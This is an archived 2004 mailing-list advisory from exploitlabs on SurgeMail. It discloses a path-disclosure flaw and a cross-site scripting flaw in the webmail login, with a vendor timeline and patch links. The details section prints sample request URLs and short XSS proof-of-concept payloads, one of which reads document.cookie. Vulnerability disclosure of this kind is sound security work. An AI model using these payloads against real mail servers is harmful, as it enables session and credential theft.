[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY9-DAV28Dd3OJXsNQ000643a1@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Surgemail - Multiple Vulnerabilities
------------------------------------------------------------
- EXPL-A-2004-002 exploitlabs.com Advisory 028 -
------------------------------------------------------------
- Surgemail -
OVERVIEW
========
"SurgeMail is a next generation Mail Server -
Combining features, performance and ease of
use into a single integrated product.
Ideal on Windows NT/2K, or Unix (Linux, Solaris etc)
and supports all all the standard protocols
IMAP, POP3, SMTP, SSL, ESMTP."
Surgmail suffers from two basic remote vulnerabilities...
1. Information Disclosure, by providing a non existant filename, the STDERR
is rendered to the user, disclosing physical directory structure.
2. XSS ( cross site scripting ) via the login form, and in particular
the "username" field. This allows for credential theft via externaly
hosted malicous script. This affects both HTTP and HTTPS access vectors.
AFFECTED PRODUCTS
=================
Surgemail ( Win32 and *nix through versions 1.9 )
WebMail v3.1d Copyright ? NetWin Ltd
http://netwinsite.com/index.html
http://netwinsite.com/overviews.htm
http://netwinsite.com/server/email_server_software.htm
DETAILS
=======
1. Information Disclosure
Surge mail's web based interface reveals physical
directory structure by requesting a non-existant
(404) request.
http://x.x.x.x/[non-existant request]
http://x.x.x.x:7080/scripts/
"Could not create process D:\surgemail/scripts/ Access Denied
Is the url correct, check for a log file in the scripts directory
and run the process in a shell window (D:\surgemail)"
http://x.x.x.x:7080/scripts/err.txt
"Could not create process D:\surgemail/scripts/err.txt File Not Found
Is the url correct, check for a log file in the scripts directory
and run the process in a shell window (D:\surgemail)"
http://x.x.x.x/scripts/err.txt
CGI did not respond correctly, it probably exited abnormally or the file
may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) ()
2. XSS ( cross site scripting )
The login form username field is vunerable to XSS
================ snip ========================
http://x.x.x.x:7080/
http://x.x.x.x:7080/<script>alert('Vulnerable')</script>
http://x.x.x.x:7080/<script>alert(document.cookie)</script>
================ snip ========================
SOLUTION
========
Vendor contacted May 16, 2003 support-surgemail@...winsite.com
Vendor acknowlegement recieved May 17, 2003
Vendor Patch / Version 2.0c released June 2, 2004
and may be obtained at
ftp://ftp.netwinsite.com/pub/surgemail/beta
http://www.netwinsite.com/surgemail/help/updates.htm
PROOF OF CONCEPT
================
( see DETAILS )
CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
mail: morning_wood@...loitlabs.com
--
web: http://exploitlabs.com
web: http://zone-h.org
ref: http://zone-h.org/en/advisories/read/id=4714/
ref: http://exploitlabs.com/files/advisories/EXPL-A-2004-002-surgmail.txt
Powered by blists - more mailing lists